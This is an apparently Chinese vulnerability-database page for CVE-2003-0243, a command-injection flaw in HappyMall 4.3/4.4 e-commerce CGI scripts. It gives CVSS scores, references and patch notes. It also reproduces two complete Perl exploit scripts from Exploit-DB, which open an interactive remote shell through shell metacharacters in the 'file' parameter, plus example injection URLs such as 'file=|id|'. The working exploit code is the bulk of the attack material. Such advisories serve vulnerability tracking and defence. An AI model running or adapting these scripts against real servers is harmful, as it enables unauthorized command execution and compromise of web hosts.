CVE-2003-0243
CVSS7.5
发布时间 :2003-05-27 00:00:00
修订时间 :2008-09-10 15:18:21
NMCOES    

[原文]Happycgi.com Happymall 4.3 and 4.4 allows remote attackers to execute arbitrary commands via shell metacharacters in the file parameter for the (1) normal_html.cgi or (2) member_html.cgi scripts.


[CNNVD]HappyMall E-Commerce软件normal_html.cgi远程命令执行漏洞(CNNVD-200305-063)

        
        HappyMall E-Commerce是一款在线购物电子商务软件。
        HappyMall E-Commerce包含的the normal_html.cgi脚本对用户提交的参数缺少充分过滤,远程攻击者可以利用这个漏洞以WEB权限在系统上执行任意命令。
        'normal_html.cgi'在调用open()不安全函数前没有充分过滤用户输入,远程攻击者可以提交包含元字符的字符串作为'file'参数,可导致以WEB进程权限在系统上执行这些命令。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:happycgi:happymall:4.3
cpe:/a:happycgi:happymall:4.4

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0243
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0243
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200305-063
(官方数据源) CNNVD

- 其它链接及资源

http://securitytracker.com/id?1006707
(UNKNOWN)  SECTRACK  1006707
http://archives.neohapsis.com/archives/vulnwatch/2003-q2/0058.html
(UNKNOWN)  VULNWATCH  20030507 Happymall E-Commerce Remote Command Execution

- 漏洞信息

HappyMall E-Commerce软件normal_html.cgi远程命令执行漏洞
高危 输入验证
2003-05-27 00:00:00 2005-10-20 00:00:00
远程  
        
        HappyMall E-Commerce是一款在线购物电子商务软件。
        HappyMall E-Commerce包含的the normal_html.cgi脚本对用户提交的参数缺少充分过滤,远程攻击者可以利用这个漏洞以WEB权限在系统上执行任意命令。
        'normal_html.cgi'在调用open()不安全函数前没有充分过滤用户输入,远程攻击者可以提交包含元字符的字符串作为'file'参数,可导致以WEB进程权限在系统上执行这些命令。
        

- 公告与补丁

        厂商补丁:
        HappyCGI
        --------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://happymall.happycgi.com

- 漏洞信息 (22571)

HappyMall E-Commerce Software 4.3/4.4 Normal_HTML.CGI Command Execution Vulnerability (EDBID:22571)
cgi webapps
2003-05-07 Verified
0 Revin Aldi
N/A [点击下载]
source: http://www.securityfocus.com/bid/7529/info

It has been reported that a problem in the HappyMall E-Commerce software package could allow an attacker to pass arbitrary commands through the normal_html.cgi script. This could lead to attacks against system resources. 

##########################################################
# HappyMail explo
# vulnerable:
# HappyCGI HappyMall 4.3
# HappyCGI HappyMall 4.4
#
#
# www.spabam.org spabam.tk spabam.da.ru go.to/spabam
# Spawn bash style Shell with webserver uid
#
# Spabam 2003 PRIV8 code
# #hackarena irc.brasnet.org
# This Script is currently under development
#####################################################

use strict;
use IO::Socket;
my $host;		
my $port;		
my $command;		
my $url;	
my $shiz;		
my @results;		
my $probe;		
my @U;			
$U[1] = "/shop/normal_html.cgi?file=|";
$U[2] = "/shop/normal_html.cgi? file=;";

&intro;
&scan;
&choose;
&command;
&exit; 
sub intro {
&help;
&host;
&server;
sleep 3;
};
sub host {
print "\nHost or IP : ";
$host=<STDIN>;
chomp $host;
if ($host eq ""){$host="127.0.0.1"};
$shiz = "|";
print "\nPort (enter to accept 80): ";
$port=<STDIN>;
chomp $port;
if ($port =~/\D/ ){$port="80"};
if ($port eq "" ) {$port = "80"};
};	
sub server {
my $X;
print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
$probe = "string";
my $output;
my $webserver = "something";
&connect;
for ($X=0; $X<=10; $X++){
	$output = $results[$X];
	if (defined $output){
	if ($output =~/IIS/){ $webserver = "apache" };
	};
};
if ($webserver ne "apache"){
my $choice = "y";
chomp $choice;
if ($choice =~/N/i) {&exit};
            }else{
print "\n\nOK";
	};		
};  
sub scan {
my $status = "not_vulnerable";
print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
print "Testing string ONE and TWO";
my $loop;
my $output;
my $flag;
$command="dir";
for ($loop=1; $loop < @U; $loop++) { 
$flag = "0";
$url = $U[$loop];
$probe = "scan";
&connect;
foreach $output (@results){
if ($output =~ /Directory/) {
                              $flag = "1";
			      $status = "vulnerable";
			      };
	};
if ($flag eq "0") { 
}else{
     };
};
if ($status eq "not_vulnerable"){

				};
}; 
sub choose {
print "\nSelect a URL (type 0 to input)";
my $choice=<STDIN>;
chomp $choice;
if ($choice > @U){ &choose };
if ($choice =~/\D/g ){ &choose };
if ($choice == 0){ &other };
$url = $U[$choice];
}; 
sub other {
my $other = <STDIN>;
chomp $other;
$U[0] = $other;
};  
sub command {
while ($command !~/quit/i) {
print "\nHELP QUIT URL SCAN Or Command

\n[$host]\$ ";
$command = <STDIN>;
chomp $command;
if ($command =~/quit/i) { &exit };
if ($command =~/url/i) { &choose }; 
if ($command =~/scan/i) { &scan };
if ($command =~/help/i) { &help };
$command =~ s/\s/+/g; 
$probe = "command";
if ($command !~/quit|url|scan|help/) {&connect};
};
&exit;
};  
sub connect {
my $connection = IO::Socket::INET->new (
				Proto => "tcp",
				PeerAddr => "$host",
				PeerPort => "$port",
				) or die "\nSorry UNABLE TO CONNECT To $host On Port $port.\n";
$connection -> autoflush(1);
if ($probe =~/command|scan/){
print $connection "GET $url$command$shiz HTTP/1.0\r\n\r\n";
}elsif ($probe =~/string/) {
print $connection "HEAD / HTTP/1.0\r\n\r\n";
};

while ( <$connection> ) { 
			@results = <$connection>;
			 };
close $connection;
if ($probe eq "command"){ &output };
if ($probe eq "string"){ &output };
};  
sub output{
print "\nOUTPUT FROM $host. \n\n";
my $display;
if ($probe eq "string") {
			my $X;
			for ($X=0; $X<=10; $X++) {
			$display = $results[$X];
			if (defined $display){print "$display";};
			sleep 1;
				};
			}else{
			foreach $display (@results){
			    print "$display";
			    sleep 1;
				};
                          };
};  
sub exit{
print "\n\n\n



ANDREA SPABAM 2002.";
print "\nspabam.da.ru spabam\@go.to";
print "\n\n\n";
exit;
};
sub help {
print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
print "\n
        HappyMall E-Commerce Software Normal_HTML.CGI 
        Command Execution Vulnerability by SPABAM 2003" ;
print "\n
";
print "\n HappyMail Exploit v0.9.9b";
print "\n 

note.. web directory is normally /var/www/html";
print "\n";
print "\n Host: www.victim.com or xxx.xxx.xxx.xxx (RETURN for 127.0.0.1)";
print "\n Command: SCAN URL HELP QUIT";
print "\n\n\n\n\n\n\n\n\n\n\n";
};


		

- 漏洞信息 (22572)

HappyMall E-Commerce Software 4.3/4.4 Member_HTML.CGI Command Execution Vulnerability (EDBID:22572)
cgi webapps
2003-05-08 Verified
0 Revin Aldi
N/A [点击下载]
source: http://www.securityfocus.com/bid/7530/info

It has been reported that a problem in the HappyMall E-Commerce software package could allow an attacker to pass arbitrary commands through the member_html.cgi script. This could lead to attacks against system resources. 

##########################################################
# HappyMall explo
# vulnerable:
# HappyCGI HappyMall 4.3
# HappyCGI HappyMall 4.4
#
#
# www.spabam.org spabam.tk spabam.da.ru go.to/spabam
# Spawn bash style Shell with webserver uid
#
# Spabam 2003 PRIV8 code
# #hackarena irc.brasnet.org
# This Script is currently under development
#####################################################

use strict;
use IO::Socket;
my $host;		
my $port;		
my $command;		
my $url;	
my $shiz;		
my @results;		
my $probe;		
my @U;			
$U[1] = "/shop/normal_html.cgi?file=|";
$U[2] = "/shop/normal_html.cgi? file=;";
$U[3] = "/shop/member_html.cgi?file=|";
$U[4] = "/shop/member_html.cgi? file=;";
&intro;
&scan;
&choose;
&command;
&exit; 
sub intro {
&help;
&host;
&server;
sleep 3;
};
sub host {
print "\nHost or IP : ";
$host=<STDIN>;
chomp $host;
if ($host eq ""){$host="127.0.0.1"};
$shiz = "|";
print "\nPort (enter to accept 80): ";
$port=<STDIN>;
chomp $port;
if ($port =~/\D/ ){$port="80"};
if ($port eq "" ) {$port = "80"};
};	
sub server {
my $X;
print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
$probe = "string";
my $output;
my $webserver = "something";
&connect;
for ($X=0; $X<=10; $X++){
	$output = $results[$X];
	if (defined $output){
	if ($output =~/IIS/){ $webserver = "apache" };
	};
};
if ($webserver ne "apache"){
my $choice = "y";
chomp $choice;
if ($choice =~/N/i) {&exit};
            }else{
print "\n\nOK";
	};		
};  
sub scan {
my $status = "not_vulnerable";
print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
print "Testing string ONE and TWO";
my $loop;
my $output;
my $flag;
$command="dir";
for ($loop=1; $loop < @U; $loop++) { 
$flag = "0";
$url = $U[$loop];
$probe = "scan";
&connect;
foreach $output (@results){
if ($output =~ /Directory/) {
                              $flag = "1";
			      $status = "vulnerable";
			      };
	};
if ($flag eq "0") { 
}else{
     };
};
if ($status eq "not_vulnerable"){

				};
}; 
sub choose {
print "\nSelect a URL (type 0 to input)";
my $choice=<STDIN>;
chomp $choice;
if ($choice > @U){ &choose };
if ($choice =~/\D/g ){ &choose };
if ($choice == 0){ &other };
$url = $U[$choice];
}; 
sub other {
my $other = <STDIN>;
chomp $other;
$U[0] = $other;
};  
sub command {
while ($command !~/quit/i) {
print "\nHELP QUIT URL SCAN Or Command

\n[$host]\$ ";
$command = <STDIN>;
chomp $command;
if ($command =~/quit/i) { &exit };
if ($command =~/url/i) { &choose }; 
if ($command =~/scan/i) { &scan };
if ($command =~/help/i) { &help };
$command =~ s/\s/+/g; 
$probe = "command";
if ($command !~/quit|url|scan|help/) {&connect};
};
&exit;
};  
sub connect {
my $connection = IO::Socket::INET->new (
				Proto => "tcp",
				PeerAddr => "$host",
				PeerPort => "$port",
				) or die "\nSorry UNABLE TO CONNECT To $host On Port $port.\n";
$connection -> autoflush(1);
if ($probe =~/command|scan/){
print $connection "GET $url$command$shiz HTTP/1.0\r\n\r\n";
}elsif ($probe =~/string/) {
print $connection "HEAD / HTTP/1.0\r\n\r\n";
};

while ( <$connection> ) { 
			@results = <$connection>;
			 };
close $connection;
if ($probe eq "command"){ &output };
if ($probe eq "string"){ &output };
};  
sub output{
print "\nOUTPUT FROM $host. \n\n";
my $display;
if ($probe eq "string") {
			my $X;
			for ($X=0; $X<=10; $X++) {
			$display = $results[$X];
			if (defined $display){print "$display";};
			sleep 1;
				};
			}else{
			foreach $display (@results){
			    print "$display";
			    sleep 1;
				};
                          };
};  
sub exit{
print "\n\n\n



ANDREA SPABAM 2002.";
print "\nspabam.da.ru spabam\@go.to";
print "\n\n\n";
exit;
};
sub help {
print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
print "\n
        HappyMall E-Commerce Software Normal_HTML.CGI 
        Command Execution Vulnerability by SPABAM 2003" ;
print "\n
";
print "\n HappyMall Exploit v1.2.1";
print "\n 

note.. web directory is normally /var/www/html";
print "\n";
print "\n Host: www.victim.com or xxx.xxx.xxx.xxx (RETURN for 127.0.0.1)";
print "\n Command: SCAN URL HELP QUIT";
print "\n\n\n\n\n\n\n\n\n\n\n";
};


		

- 漏洞信息

3566
Happymall normal_html.cgi Arbitrary Command Execution

- 漏洞描述

Happymall contains a flaw that may allow a malicious user to run arbitrary commands on the web server. The issue is triggered when an attacker uses a specially crafted URL. It is possible that the flaw may allow arbitrary code execution resulting in a loss of confidentiality, integrity, and/or availability.

- 时间线

2003-05-03 2003-04-26
Unknow Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Happycgi.com has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

HappyMall E-Commerce Software Member_HTML.CGI Command Execution Vulnerability
Input Validation Error 7530
Yes No
2003-05-08 12:00:00 2009-07-11 09:07:00
Discovery credited to Revin Aldi.

- 受影响的程序版本

HappyCGI HappyMall 4.4
HappyCGI HappyMall 4.3

- 漏洞讨论

It has been reported that a problem in the HappyMall E-Commerce software package could allow an attacker to pass arbitrary commands through the member_html.cgi script. This could lead to attacks against system resources.

- 漏洞利用

http://www.example.com/shop/member_html.cgi?file=|id|
http://www.example.com/shop/member_html.cgi? file=;id|

The following exploit was provided:

- 解决方案

It has been reported that a patch exists at URL http://happymall.happycgi.com/forum/forum_detail.cgi?thread=353. This information is not vendor-confirmed, and it has not been possible to independently confirm this information.
-------------
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站